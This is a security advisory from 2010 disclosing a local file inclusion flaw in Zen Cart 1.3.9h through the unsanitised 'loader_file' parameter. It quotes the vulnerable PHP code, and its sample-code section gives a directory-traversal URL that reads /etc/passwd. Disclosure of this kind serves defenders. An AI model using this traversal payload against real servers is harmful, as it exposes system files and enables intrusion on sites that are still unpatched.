扫码分享
验证:
体验盒子Zen Cart 1.3.9h Local File Inclusion Vulnerability
NameZen Cart
Vendorhttp://www.zen-cart.com
Versions Affected 1.3.9h
AuthorSalvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date2010-11-03
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
Zen Cart truly is theartof e-commerce;free,
user-friendly,opensourceshopping cart software. The
ecommerce web site design program is being developed by a
group of like-minded shop owners, programmers, designers,
and consultants that think ecommerce web design couldbe
and should be done differently.
II. DESCRIPTION
_______________
A parameter is not properly sanitised before beingused
by the include() PHP's function.
III. ANALYSIS
_____________
Summary:
A) Local File Inclusion
A) Local File Inclusion
_______________________
Input passed to the "loader_file" parameterin
includes/initsystem.phpisnot properly verified before
beingusedtoincludefiles. This can be exploited to
includearbitraryfiles from local resourcesvia
directory traversal attacks.
Successful exploitation requires that register_globals is
set to On.
The following is the vulnerable code:
<?php
$base_dir = DIR_WS_INCLUDES . 'auto_loaders/';
if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) {
$base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/';
}
include($base_dir . $loader_file);
IV. SAMPLE CODE
_______________
A) Local File Inclusion
http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd
V. FIX
______
No fix.
体验盒子
